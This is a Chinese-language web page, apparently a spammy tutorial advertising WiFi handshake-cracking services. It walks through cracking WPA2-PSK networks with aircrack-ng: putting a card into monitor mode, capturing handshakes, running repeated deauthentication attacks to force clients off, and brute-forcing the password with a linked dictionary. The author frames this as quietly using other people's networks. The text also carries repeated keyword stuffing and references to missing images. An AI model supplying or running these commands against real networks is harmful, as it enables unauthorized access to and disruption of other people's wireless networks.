wi-fi密码字典 厉害啦,用最朴实的方法WiFi无线参透

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 握手包跑包

各位好 又见面了 我是曹操 今天给大家带来一篇新的教程

希望各位细心学习 低调用网

wi-fi密码字典

WPA/WPA2

WPA/WPA2是一种比WEP强壮的加密算法,选择这种安全类型,路由器将采用Radius服务器进行身份认证并获取密钥的WPA或WPA2安全形式。由于需要建立专用认证服务器,成本昂贵且配置复杂,因此不推荐不同用户使用此安全类型。

WPA-PSK/WPA2-PSK

WPA-PSK/WPA2-PSK安全类型实际上是WPA/WPA2的简化版本,基于共享密钥的WPA形式,安全性高且设置相对简单,适合家庭用户和小型企业使用。

详细设置

  • 认证类型:选择系统采用的安全形式,即Enterprise、WPA-PSK、WPA2-PSK。
  • 加密算法:选择对无线数据进行加密的安全算法,选项包括Enterprise、TKIP、AES。默认选项为Enterprise,选择后,路由器将根据需求选择TKIP或AES加密方法。注意11N模式不支持TKIP算法。
  • PSK密码:即WPA-PSK/WPA2-PSK的初始密钥,在设置时,需要8-63个ASCII字符或8-64个十六进制字符。
  • 组密钥更新周期:设置广播和组播密钥的定时更新,以秒为单位,最小值为30,若值为0表示不进行更新。

使用Aircrack-ng抓取WPA2-PSK握手包

主要步骤

  1. 设置无线网卡至监听模式:airmon-ng start wlan0
  2. 扫描周围WPA2-PSK加密的无线信号:airodump-ng wlan0mon
  3. 新建一个终端,抓取握手包:airodump-ng -c [num] -w wpa2 wlan0mon(需要指定信道)
  4. 在等待过程中,发起DeAuth攻击,强制将客户端踢下线重连,抓取握手包:aireplay-ng -0 5 -a BSSID -c STATION wlan0mon(设置为发起5次攻击)

如果想要持续发起攻击,可以使用以下命令:aireplay-ng -0 0 -a BSSID -c STATION wlan0mon

wi-fi密码字典wi-fi密码字典wi-fi密码字典wi-fi密码字典wi-fi密码字典

现在需要让虚拟机连接网卡。连接成功后,输入ifconfig会看到,然后输入airmon-ng start wlan0成功后,开始监听(扫描周围的无线信号)。在过程中,信道为CN,使用以下命令抓取目标的握手包:airodump-ng -c 信道 --bssid xxx -w 保存路径 wlan0mon

wi-fi密码字典

强制将客户端踢下线:aireplay-ng -0 0 -a 目标的MAC地址 -c 目标客户端MAC wlan0mon。开始进行攻击,但有时候该命令会报错。这是因为网卡会随机使用信道,多尝试几次同样的命令直到成功为止。

wi-fi密码字典

如图所示就证明抓到了握手包。开始破解密码,执行以下命令。最后使用好的字典进行爆破,字典链接如下:点击这里 提取码: zpdr。

aircrack-ng -w 字典 保存的包

aircrack-ng -w 后面都是绝对路径。


赞(0)